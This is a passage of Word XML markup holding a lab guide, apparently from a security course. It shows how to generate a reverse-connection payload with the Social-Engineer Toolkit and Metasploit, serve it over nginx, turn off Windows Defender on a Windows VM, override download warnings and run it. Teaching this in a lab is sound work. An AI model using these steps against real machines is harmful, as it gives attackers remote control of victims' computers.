                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and hit </w:t>
            </w:r>
            <w:r w:rsidR="00B34C44" w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enter</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4168BA40" w14:textId="77EF91A4" w:rsidR="00DA6395" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CB3371D" wp14:editId="78FC3857">
                  <wp:extent cx="4297945" cy="3715649"/>
                  <wp:effectExtent l="19050" t="19050" r="26670" b="18415"/>
                  <wp:docPr id="11196680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6803" name="Picture 2"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6692" cy="3723211"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C8C3B1" w14:textId="4FC3D7AA" w:rsidR="00DA6395" w:rsidRPr="001A500E" w:rsidRDefault="00DA6395" w:rsidP="008705DD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5. </w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">We will then be asked for the IP address </w:t>
            </w:r>
            <w:r w:rsidR="00B34C44" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">to </w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">which the target will connect when the payload is run. </w:t>
            </w:r>
            <w:r w:rsidR="0019319B" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Type </w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IP address</w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> of ParrotOS (found using </w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Constantia" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Constantia"/>
              </w:rPr>
              <w:t>ifconfig</w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="00B34C44" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">and press </w:t>
            </w:r>
            <w:r w:rsidR="00B34C44" w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enter</w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D6ADF96" w14:textId="240FBF11" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="008705DD" w:rsidP="008705DD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">6. Choose a port for the payload listener </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">(e.g., </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Constantia" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Constantia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5555</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B7763A" w14:textId="68DD7E4C" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14431775" wp14:editId="521AD419">
                  <wp:extent cx="4108176" cy="3582993"/>
                  <wp:effectExtent l="19050" t="19050" r="26035" b="17780"/>
                  <wp:docPr id="152548149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81494" name="Picture 3"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28237" cy="3600490"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3915BF67" w14:textId="2735872D" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="008705DD" w:rsidP="008705DD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7. Once you enter the port, SET will begin generating the payload. Once this is done, SET will ask if you want to start the payload and listener now. Type </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>yes</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and hit </w:t>
            </w:r>
            <w:r w:rsidR="006C3343" w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enter</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA92A03" w14:textId="75079F09" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="406D20F8" wp14:editId="5BD66D8F">
                  <wp:extent cx="4065499" cy="3497580"/>
                  <wp:effectExtent l="19050" t="19050" r="11430" b="26670"/>
                  <wp:docPr id="2092292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9259" name="Picture 2092292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75586" cy="3506258"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="32BA6B38" w14:textId="17F1CF5D" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="008705DD" w:rsidP="008705DD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8. The generated payload will be stored at: </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/root/.set/payload.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C344CDD" w14:textId="4E80E9A6" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="008705DD" w:rsidP="008705DD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9. SET will now launch Metasploit and begin a listener for us using the information we provided for the payload. This is an easier way of creating a Metasploit payload and starting a listener.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="290A18F3" w14:textId="2F0F6DF7" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="008705DD" w:rsidP="008705DD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">10. When the listener is started, transfer the payload file to your Windows virtual machine. It will be called </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>payload.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. In order to transfer this file to the Windows machine easily, we will run </w:t>
            </w:r>
            <w:r w:rsidR="0044408D" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nginx web server</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in ParrotOS VM and download the file from within Windows. Open a </w:t>
            </w:r>
            <w:r w:rsidR="006C18D9" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">new </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">terminal </w:t>
            </w:r>
            <w:r w:rsidR="006C18D9" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">window </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>in ParrotOS</w:t>
            </w:r>
            <w:r w:rsidR="0044408D" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> then type these commands: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ED68FF7" w14:textId="77777777" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="008705DD" w:rsidP="001A500E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sudo cp -v /root/.set/payload.exe /var/www/html/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4982931A" w14:textId="485DDA9C" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="008705DD" w:rsidP="001A500E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sudo nginx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="274524A2" w14:textId="42905B3F" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="370966D7" wp14:editId="2E815C2F">
                  <wp:extent cx="4105275" cy="1939626"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="22860"/>
                  <wp:docPr id="1169128218"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28218" name="Picture 5" descr="A screen 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26719" cy="1949758"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4286DC" w14:textId="7DFA57D8" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="008705DD" w:rsidP="008705DD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">11. Now, switch to Windows VM, open a browser. Type this URL into the address bar: </w:t>
            </w:r>
            <w:r w:rsidR="006C18D9" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http://192.168.100.68/payload.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6447EF40" w14:textId="1E4058AE" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2596D086" wp14:editId="3E4F8DA3">
                  <wp:extent cx="5386032" cy="1522671"/>
                  <wp:effectExtent l="19050" t="19050" r="24765" b="20955"/>
                  <wp:docPr id="1479346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463" name="Picture 6"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64263" cy="1544787"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFD4F22" w14:textId="3CB1EDD3" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="008705DD" w:rsidP="008705DD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">12. Ensure that </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows Defender</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> is turned off so that the payload can run effectively. Then, with the listener running in Metasploit, </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">download </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>the payload in the Windows VM.</w:t>
            </w:r>
            <w:r w:rsidR="006C18D9" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Click on the </w:t>
            </w:r>
            <w:r w:rsidR="006C18D9" w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Keep</w:t>
            </w:r>
            <w:r w:rsidR="006C18D9" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to continue the downloading process.</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="243628C5" w14:textId="661C8D7C" w:rsidR="0037552B" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E9CF340" wp14:editId="3D2F879E">
                  <wp:extent cx="4869951" cy="1723662"/>
                  <wp:effectExtent l="12700" t="12700" r="6985" b="16510"/>
                  <wp:docPr id="1489404"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04" name="Picture 7"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908280" cy="1737228"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="706CB273" w14:textId="4CD2CFC0" w:rsidR="008B1E16" w:rsidRPr="001A500E" w:rsidRDefault="008B1E16" w:rsidP="001A500E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">13. Click on the </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Keep anyway</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to proceed with the downloading. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA9CA57" w14:textId="15C43BC8" w:rsidR="0037552B" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DF082DF" wp14:editId="371062C7">
                  <wp:extent cx="4869815" cy="2908294"/>
                  <wp:effectExtent l="12700" t="12700" r="6985" b="13335"/>
                  <wp:docPr id="170366105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1057" name="Picture 8"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891459" cy="2921220"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="04C53CAC" w14:textId="42D12951" w:rsidR="0037552B" w:rsidRPr="001A500E" w:rsidRDefault="008460DE" w:rsidP="0037552B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="0037552B" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. Now </w:t>
            </w:r>
            <w:r w:rsidR="0044408D" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>double-</w:t>
            </w:r>
            <w:r w:rsidR="0037552B" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">click on the </w:t>
            </w:r>
            <w:r w:rsidR="0037552B" w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>payload.exe</w:t>
            </w:r>
            <w:r w:rsidR="0037552B" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
            <w:r w:rsidR="008B1E16" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r w:rsidR="0037552B" w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>execute</w:t>
            </w:r>
            <w:r w:rsidR="0037552B" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> it in the Windows VM. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2028B59B" w14:textId="1D09D7D5" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A329DA3" wp14:editId="1E1A5ACF">
                  <wp:extent cx="4869815" cy="1317391"/>
                  <wp:effectExtent l="12700" t="12700" r="6985" b="16510"/>
                  <wp:docPr id="205116064"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6064" name="Picture 10"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99936" cy="1325539"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6199E13E" w14:textId="01916F20" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="008460DE" w:rsidP="008705DD">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
